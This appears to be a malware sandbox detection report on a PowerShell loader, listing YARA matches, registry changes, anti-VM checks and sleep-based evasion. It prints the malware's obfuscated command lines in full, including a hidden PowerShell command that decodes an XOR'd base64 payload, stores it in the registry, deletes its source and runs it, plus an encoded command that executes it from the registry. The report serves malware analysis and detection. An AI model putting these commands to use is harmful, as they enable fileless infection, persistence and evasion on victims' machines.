Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Messages.cs	.Net Code: Memory

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 \| Invoke-Expression"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 \| Invoke-Expression"	Jump to behavior

Yara detected Costura Assembly Loader

Source: Yara match	File source: 3.2.powershell.exe.24311715540.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.24311023810.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.24310fe37d8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.243110a3848.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.24311715540.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.24311023810.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.243110a3848.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.24310fe37d8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1553871152.000002281B5C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\D7AEA3DBB334FF534DC1 9BCF8DFC92BC643B9414A446DA4632050DE1B7577FEDF4F7711D3B4B3D46E06D

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6155	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3663	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5703	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4119	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704	Thread sleep count: 5703 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704	Thread sleep count: 4119 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: powershell.exe, 00000003.00000002.2338047448.00000243025C4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -VmCIl

